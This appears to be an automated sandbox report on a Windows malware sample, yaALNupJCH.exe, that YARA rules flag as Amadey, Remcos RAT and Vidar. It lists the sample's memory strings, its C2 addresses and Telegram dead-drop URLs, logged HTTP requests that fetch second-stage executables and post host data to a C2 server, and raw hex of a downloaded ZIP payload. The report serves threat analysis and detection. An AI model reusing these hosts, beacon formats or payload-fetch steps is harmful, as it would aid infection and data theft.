Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199555780195
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199555780195update.zipopenopen_NULL%s
Source: yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	String found in binary or memory: https://t.me/solonichat
Source: yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/solonichatCA
Source: yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/solonichatMA
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	String found in binary or memory: https://t.me/solonichatcolo1dtemp.zipMozilla/5.0
Source: yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/solonichatwF
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: yaALNupJCH.exe, 00000003.00000002.910498852.000000000EEB6000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: yaALNupJCH.exe, 00000003.00000003.895202513.000000000EBBC000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: 40080133769305826732791000.3.dr	String found in binary or memory: https://www.google.com/search?q=.net
Source: 40080133769305826732791000.3.dr	String found in binary or memory: https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&
Source: 40080133769305826732791000.3.dr	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D

Source: unknown

DNS traffic detected: queries for: mardukoff.info

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CBE2B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,std::_Xinvalid_argument,

0_2_00CBE2B0

Source: global traffic	HTTP traffic detected: GET /solonichat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /svchost.dll HTTP/1.1Host: transdi.org
Source: global traffic	HTTP traffic detected: GET /svchost.exe HTTP/1.1Host: pixcode.com.mx
Source: global traffic	HTTP traffic detected: GET /host.exe HTTP/1.1Host: transdi.org
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /40eaa63b296d256c2181f079611d421f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333
Source: global traffic	HTTP traffic detected: GET /temp.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 28 Sep 2023 04:01:58 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 81.19.131.36
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 95.141.41.12
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.2.169

Source: unknown

HTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041680F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0041680F

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

2_2_0040A3E0

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,

2_2_0040B65C

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,

2_2_0040B65C

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 3_2_0041AD48 _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,_MSFOpenExW,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_0041AD48

Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_e3c4c6c9-e

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041C930 SystemParametersInfoW,

2_2_0041C930

System Summary

Malicious sample detected (through community Yara rule)

Source: yaALNupJCH.exe, type: SAMPLE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CB5E90	0_2_00CB5E90
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD4191	0_2_00CD4191
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD0918	0_2_00CD0918
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD42B1	0_2_00CD42B1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC6240	0_2_00CC6240
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEA251	0_2_00CEA251
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD64C0	0_2_00CD64C0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD0480	0_2_00CD0480
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CD550D	0_2_00CD550D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0041F048	2_2_0041F048
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043E00C	2_2_0043E00C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0045409A	2_2_0045409A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_004380A8	2_2_004380A8
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00446130	2_2_00446130
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0045326C	2_2_0045326C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043E23B	2_2_0043E23B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_004272EB	2_2_004272EB
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00437426	2_2_00437426
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043E498	2_2_0043E498
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_004386B0	2_2_004386B0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043783E	2_2_0043783E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0044D889	2_2_0044D889
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00433894	2_2_00433894
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00427994	2_2_00427994
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00427AFD	2_2_00427AFD
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0041DAB0	2_2_0041DAB0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00437C73	2_2_00437C73
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00426D5C	2_2_00426D5C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043DDDD	2_2_0043DDDD
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00435DA1	2_2_00435DA1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00413F18	2_2_00413F18
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00436F2A	2_2_00436F2A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD4191	2_2_00CD4191
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD42B1	2_2_00CD42B1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC6240	2_2_00CC6240
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEA251	2_2_00CEA251
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD64C0	2_2_00CD64C0
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD0480	2_2_00CD0480
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD550D	2_2_00CD550D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CD0918	2_2_00CD0918
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00421BF1	3_2_00421BF1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00424056	3_2_00424056
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00423069	3_2_00423069
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040715C	3_2_0040715C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004211CC	3_2_004211CC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004061D5	3_2_004061D5
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0043533F	3_2_0043533F
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004234FE	3_2_004234FE
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040583B	3_2_0040583B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0043489D	3_2_0043489D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0042389C	3_2_0042389C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00436A5F	3_2_00436A5F
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00435A1B	3_2_00435A1B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00423C6E	3_2_00423C6E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00425C10	3_2_00425C10
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00407C8C	3_2_00407C8C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0041FD50	3_2_0041FD50
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00434DEE	3_2_00434DEE
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EAD2AC	3_2_61EAD2AC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E4B8A1	3_2_61E4B8A1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E88FCA	3_2_61E88FCA
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E75F1F	3_2_61E75F1F
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EA91F6	3_2_61EA91F6
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E9316A	3_2_61E9316A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E9F0ED	3_2_61E9F0ED
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61EA70CF	3_2_61EA70CF
